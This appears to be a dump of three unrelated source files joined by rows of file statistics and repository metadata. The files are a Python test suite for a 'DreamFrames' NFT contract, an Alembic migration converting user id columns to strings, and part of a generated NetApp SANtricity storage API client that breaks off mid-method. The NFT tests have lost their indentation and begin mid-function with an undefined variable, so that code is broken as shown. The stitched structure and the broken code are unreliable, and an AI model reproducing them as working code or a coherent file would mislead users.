TYPE_KEY = "type"
SUBTYPE_KEY = "subtype"
NAME_KEY = "name"
DESCRIPTION_KEY = "description"
TAGS_KEY = "tags"
_type = "DreamFrames"
_subtype = "Dream"
_name = "Goober"
_description = "Film token"
_tags = "it is good token"
(timestamp, index, value) = dream_frames_nft.getValue(token1, TYPE_KEY)
assert value == _type
assert index == 0
(timestamp, index, value) = dream_frames_nft.getValue(token1, SUBTYPE_KEY)
assert value == _subtype
assert index == 1
(timestamp, index, value) = dream_frames_nft.getValue(token1, NAME_KEY)
assert value == _name
assert index == 2
(timestamp, index, value) = dream_frames_nft.getValue(token1, "NO KEY")
assert value == ""
assert index == 0
assert timestamp == 0
def _dream_frames_nft_mint(dream_frames_nft, _to, _type, minter):
_subtype = "Dream"
_name = "Goober"
_description = "Film token"
_tags = "it is good token"
token_id= dream_frames_nft.mint(_to, _type, _subtype, _name, _description,_tags, {"from": minter}).return_value
assert dream_frames_nft.ownerOf(token_id) == accounts[0]
return dream_frames_nft, token_id
def test_dream_frames_nft_mint(dream_frames_nft):
_to = accounts[0]
_type = "DreamFrames"
_dream_frames_nft_mint(dream_frames_nft, _to, _type, accounts[0])
_dream_frames_nft_mint(dream_frames_nft, _to, _type, accounts[2])
def test_transfer_dream_frames_nft(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[2])
transfer_to = accounts[5]
dream_frames_nft.approve(transfer_to, token1, {"from": holder})
dream_frames_nft.safeTransferFrom(holder, transfer_to, token1, {"from":holder})
assert dream_frames_nft.isOwnerOf(token1,transfer_to)
def test_attributes_by_mint(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[2])
_index = 0
(key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1,_index)
assert key == "type"
assert value == "DreamFrames"
_index = 1
(key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1,_index)
assert key == "subtype"
assert value == "Dream"
_index = 2
(key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1,_index)
assert key == "name"
assert value == "Goober"
def test_add_attributes(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
key_to_add = "rarity"
value_to_add = "very rare"
dream_frames_nft.addAttribute(token1, key_to_add, value_to_add, {"from": holder})
_index = 5
(key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1,_index)
assert key == key_to_add
assert value == value_to_add
def test_set_attribute(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
_subtype = "Dream"
_name = "Goober"
_description = "Film token"
_tags = "it is good token"
TYPE_KEY = "type"
SUBTYPE_KEY = "subtype"
NAME_KEY = "name"
DESCRIPTION_KEY = "description"
TAGS_KEY = "tags"
dream_frames_nft, token1 = _dream_frames_nft_without_all_attributes_mint(dream_frames_nft, holder, _type, accounts[0])
dream_frames_nft.setAttribute(token1, SUBTYPE_KEY, _subtype)
dream_frames_nft.setAttribute(token1, NAME_KEY, _name)
dream_frames_nft.setAttribute(token1, DESCRIPTION_KEY, _description)
dream_frames_nft.setAttribute(token1, TAGS_KEY, _tags)
_index = 0
(key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1,_index)
assert key == "type"
assert value == "DreamFrames"
_index = 1
(key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1,_index)
assert key == "subtype"
assert value == "Dream"
def test_update_attribute(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
SUBTYPE_KEY = "subtype"
NAME_KEY = "name"
_subtype = "Channel"
_name = "Dream Movie"
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[2])
dream_frames_nft.updateAttribute(token1,SUBTYPE_KEY,_subtype, {"from": holder})
dream_frames_nft.updateAttribute(token1,NAME_KEY,_name, {"from": holder})
with reverts():
dream_frames_nft.updateAttribute(token1,"NO TYPE",_subtype, {"from": holder})
_index = 1
(key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1,_index)
assert key == "subtype"
assert value == "Channel"
_index = 2
(key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1,_index)
assert key == "name"
assert value == "Dream Movie"
def _dream_frames_nft_without_all_attributes_mint(dream_frames_nft, _to, _type, minter):
token_id= dream_frames_nft.mint(_to, _type, "","","","",{"from": minter}).return_value
assert dream_frames_nft.ownerOf(token_id) == accounts[0]
return dream_frames_nft, token_id
def test_remove_attribute(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
key_to_remove = "name"
dream_frames_nft.removeAttribute(token1,key_to_remove, {"from":holder})
with reverts():
key_to_remove = "type"
dream_frames_nft.removeAttribute(token1,key_to_remove, {"from":holder})
def test_secondary_account(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
secondaryAccount = accounts[9]
dream_frames_nft.addSecondaryAccount(secondaryAccount, {"from": accounts[0]})
assert dream_frames_nft.isOwnerOf(token1,secondaryAccount)
def test_remove_secondary_account(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
secondaryAccount = accounts[9]
dream_frames_nft.addSecondaryAccount(secondaryAccount, {"from": accounts[0]})
assert dream_frames_nft.isOwnerOf(token1,secondaryAccount)
dream_frames_nft.removeSecondaryAccount(secondaryAccount)
assert dream_frames_nft.isOwnerOf(token1,secondaryAccount) == False
def test_set_tokenURI(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[2])
dream_frames_nft.setTokenURI(token1, "https://something.com", {"from": accounts[0]})
with reverts("DreamChannelNFT: set Token URI of token that is not own"):
dream_frames_nft.setTokenURI(token1, "https://something.com", {"from": accounts[5]})
assert dream_frames_nft.tokenURI(token1) == "https://something.com"
def test_set_baseURI(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
uri = "https://something.com"
dream_frames_nft.setBaseURI("https://something.com/", {"from":accounts[0]})
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
assert dream_frames_nft.tokenURI(token1) == "https://something.com/1"
with reverts("Owned: caller is not the owner"):
dream_frames_nft.setBaseURI("https://something.com/", {"from":accounts[5]})
def test_burn(dream_frames_nft):
_to = accounts[0]
_type = "DreamFrames"
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, _to, _type, accounts[0])
dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, _to, _type, accounts[2])
with reverts():
dream_frames_nft.burn(token1, {"from": accounts[5]})
dream_frames_nft.burn(token1, {"from": accounts[0]})
with reverts():
dream_frames_nft.burn(token2, {"from": accounts[2]})
dream_frames_nft.burn(token2, {"from": accounts[0]})
_index = 1
(key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1,_index)
assert key == ""
assert value == ""
assert timestamp == 0
| 32.240854
| 122
| 0.715366
| 1,355
| 10,575
| 5.178598
| 0.084133
| 0.228873
| 0.291293
| 0.094057
| 0.821861
| 0.772267
| 0.760581
| 0.727376
| 0.682913
| 0.610232
| 0
| 0.016657
| 0.176832
| 10,575
| 327
| 123
| 32.33945
| 0.789431
| 0
| 0
| 0.614679
| 0
| 0
| 0.082079
| 0
| 0
| 0
| 0
| 0
| 0.192661
| 1
| 0.077982
| false
| 0.004587
| 0.022936
| 0
| 0.110092
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
756261a113cf70d4c7ba12df8298dce33c992073
| 3,905
|
py
|
Python
|
alembic/versions/58c319e84d94_change_user_id_type_to_string.py
|
shvms/match-recommendation-service
|
fb6ec02772eaf4ea9c2fce7567d418cb65234b8b
|
[
"MIT"
] | 2
|
2021-06-09T20:50:25.000Z
|
2021-06-18T17:40:29.000Z
|
alembic/versions/58c319e84d94_change_user_id_type_to_string.py
|
shvms/match-recommendation-service
|
fb6ec02772eaf4ea9c2fce7567d418cb65234b8b
|
[
"MIT"
] | 9
|
2021-04-30T21:36:52.000Z
|
2021-05-23T18:39:59.000Z
|
alembic/versions/58c319e84d94_change_user_id_type_to_string.py
|
shvms/match-recommendation-service
|
fb6ec02772eaf4ea9c2fce7567d418cb65234b8b
|
[
"MIT"
] | 1
|
2021-04-27T15:35:54.000Z
|
2021-04-27T15:35:54.000Z
|
"""Change User id type to string
Revision ID: 58c319e84d94
Revises: a15b1085162f
Create Date: 2021-05-04 01:10:37.401748
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '58c319e84d94'
down_revision = 'a15b1085162f'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint('tracks_user_id_fkey', 'tracks', type_='foreignkey')
op.drop_constraint('musictaste_user_id_fkey', 'musictaste', type_='foreignkey')
op.drop_constraint('rightswipes_swiper_fkey', 'rightswipes', type_='foreignkey')
op.drop_constraint('rightswipes_swipee_fkey', 'rightswipes', type_='foreignkey')
op.alter_column('users', 'id',
existing_type=sa.INTEGER(),
type_=sa.String(),
existing_nullable=False,
existing_server_default=sa.text("nextval('users_id_seq'::regclass)"))
op.alter_column('musictaste', 'user_id',
existing_type=sa.INTEGER(),
type_=sa.String(),
existing_nullable=True)
op.alter_column('rightswipes', 'swipee',
existing_type=sa.INTEGER(),
type_=sa.String(),
existing_nullable=False)
op.alter_column('rightswipes', 'swiper',
existing_type=sa.INTEGER(),
type_=sa.String(),
existing_nullable=False)
op.alter_column('tracks', 'user_id',
existing_type=sa.INTEGER(),
type_=sa.String(),
existing_nullable=True)
op.create_foreign_key("tracks_user_id_fkey", "tracks", "users", ["user_id"], ["id"], ondelete='CASCADE')
op.create_foreign_key("musictaste_user_id_fkey", "musictaste", "users", ["user_id"], ["id"], ondelete='CASCADE')
op.create_foreign_key("rightswipes_swiper_fkey", "rightswipes", "users", ["swiper"], ["id"], ondelete='CASCADE')
op.create_foreign_key("rightswipes_swipee_fkey", "rightswipes", "users", ["swipee"], ["id"], ondelete='CASCADE')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint('tracks_user_id_fkey', 'tracks', type_='foreignkey')
op.drop_constraint('musictaste_user_id_fkey', 'musictaste', type_='foreignkey')
op.drop_constraint('rightswipes_swiper_fkey', 'rightswipes', type_='foreignkey')
op.drop_constraint('rightswipes_swipee_fkey', 'rightswipes', type_='foreignkey')
op.alter_column('users', 'id',
existing_type=sa.String(),
type_=sa.INTEGER(),
existing_nullable=False,
existing_server_default=sa.text("nextval('users_id_seq'::regclass)"))
op.alter_column('tracks', 'user_id',
existing_type=sa.String(),
type_=sa.INTEGER(),
existing_nullable=True)
op.alter_column('rightswipes', 'swiper',
existing_type=sa.String(),
type_=sa.INTEGER(),
existing_nullable=False)
op.alter_column('rightswipes', 'swipee',
existing_type=sa.String(),
type_=sa.INTEGER(),
existing_nullable=False)
op.alter_column('musictaste', 'user_id',
existing_type=sa.String(),
type_=sa.INTEGER(),
existing_nullable=True)
op.create_foreign_key("tracks_user_id_fkey", "tracks", "users", ["user_id"], ["id"], ondelete='CASCADE')
op.create_foreign_key("musictaste_user_id_fkey", "musictaste", "users", ["user_id"], ["id"], ondelete='CASCADE')
op.create_foreign_key("rightswipes_swiper_fkey", "rightswipes", "users", ["swiper"], ["id"], ondelete='CASCADE')
op.create_foreign_key("rightswipes_swipee_fkey", "rightswipes", "users", ["swipee"], ["id"], ondelete='CASCADE')
# ### end Alembic commands ###
| 44.375
| 116
| 0.638156
| 430
| 3,905
| 5.490698
| 0.165116
| 0.050826
| 0.055061
| 0.060991
| 0.889454
| 0.889454
| 0.889454
| 0.889454
| 0.851334
| 0.837781
| 0
| 0.0182
| 0.212036
| 3,905
| 87
| 117
| 44.885057
| 0.749106
| 0.079898
| 0
| 0.878788
| 0
| 0
| 0.275591
| 0.096175
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.030303
| 0
| 0.060606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
347675d375654f949d123e0e4e53978a7e589f48
| 193,946
|
py
|
Python
|
netapp/santricity/api/symbol/d_api.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 5
|
2016-08-23T17:52:22.000Z
|
2019-05-16T08:45:30.000Z
|
netapp/santricity/api/symbol/d_api.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 2
|
2016-11-10T05:30:21.000Z
|
2019-04-05T15:03:37.000Z
|
netapp/santricity/api/symbol/d_api.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 7
|
2016-08-25T16:11:44.000Z
|
2021-02-22T05:31:25.000Z
|
#!/usr/bin/env python
# coding: utf-8
"""
DApi.py
The Clear BSD License
Copyright (c) – 2016, NetApp, Inc. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of NetApp, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from __future__ import absolute_import
import sys
import os
# python 2 and python 3 compatibility library
from six import iteritems
from ....santricity.configuration import Configuration
from ....santricity.api_client import ApiClient
class DApi(object):
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient(context_path='/devmgr/v2')
self.api_client = config.api_client
def symbol_deactivate_discrete_time_series(self, system_id, body, **kwargs):
"""
This procedure deactivates the discrete time series statistical streams
Documented return codes: ok, error, illegalParam, invalidRequest.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_deactivate_discrete_time_series(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param int body: A StatStreamId object that identifies the discrete time series to deactivate. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_deactivate_discrete_time_series" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_deactivate_discrete_time_series`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_deactivate_discrete_time_series`")
resource_path = '/storage-systems/{system-id}/symbol/deactivateDiscreteTimeSeries'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_deactivate_fibre_channel_check_point_based_async_mirroring(self, system_id, **kwargs):
"""
This procedure will disable mirroring over Fibre Channel (freeing up dedicated channel).
Documented return codes: ok, arvmAsyncMirrorGroupPresent.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_deactivate_fibre_channel_check_point_based_async_mirroring(system_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_deactivate_fibre_channel_check_point_based_async_mirroring" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_deactivate_fibre_channel_check_point_based_async_mirroring`")
resource_path = '/storage-systems/{system-id}/symbol/deactivateFibreChannelCheckPointBasedAsyncMirroring'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_deactivate_histogram(self, system_id, body, **kwargs):
"""
This procedure deactivates a histogram statistics set, given a stream ID.
Documented return codes: ok, error, illegalParam, invalidRequest.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_deactivate_histogram(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param int body: A StatStreamId object that identifies the histogram set to deactivate. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_deactivate_histogram" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_deactivate_histogram`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_deactivate_histogram`")
resource_path = '/storage-systems/{system-id}/symbol/deactivateHistogram'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_deactivate_mirroring(self, system_id, **kwargs):
"""
Deactivate Remote Mirroring
Documented return codes: ok, illegalParam, noHeap, tryAlternate, internalError, iconFailure, mirrorsPresent, rvmFibreError.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_deactivate_mirroring(system_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_deactivate_mirroring" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_deactivate_mirroring`")
resource_path = '/storage-systems/{system-id}/symbol/deactivateMirroring'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_deassign_drives_as_hot_spares(self, system_id, body, **kwargs):
"""
This procedure causes the drives specified by the argument to be deassigned as hot spares. They will be returned to the pool of unassigned drives, and thus be added to the unconfigured capacity pool of the storage array. Note that a hot spare drive cannot be deassigned if it is currently in use, sparing for a failed drive.
Documented return codes: ok, illegalParam, tryAlternate, noSparesDeassigned, someSparesDeassigned.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_deassign_drives_as_hot_spares(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param DriveRefList body: A list of DriveRef values that identifies all drives to be affected by this operation. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_deassign_drives_as_hot_spares" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_deassign_drives_as_hot_spares`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_deassign_drives_as_hot_spares`")
resource_path = '/storage-systems/{system-id}/symbol/deassignDrivesAsHotSpares'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_async_mirror_group(self, system_id, body, **kwargs):
"""
This procedure will delete an Async Mirror Group (AMG).
Documented return codes: ok, arvmGroupDoesNotExist, arvmGroupNotEmpty, remoteInternalError, remoteDatabaseError, arvmRemoteGroupNotEmpty, remoteTryAlternate, arvmOnlyLocalAmgDeleted.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_async_mirror_group(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param AsyncMirrorGroupDeletionDescriptor body: An object containing all of the required attributes to delete an Asynchronous Mirror Group. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_async_mirror_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_async_mirror_group`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_async_mirror_group`")
resource_path = '/storage-systems/{system-id}/symbol/deleteAsyncMirrorGroup'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
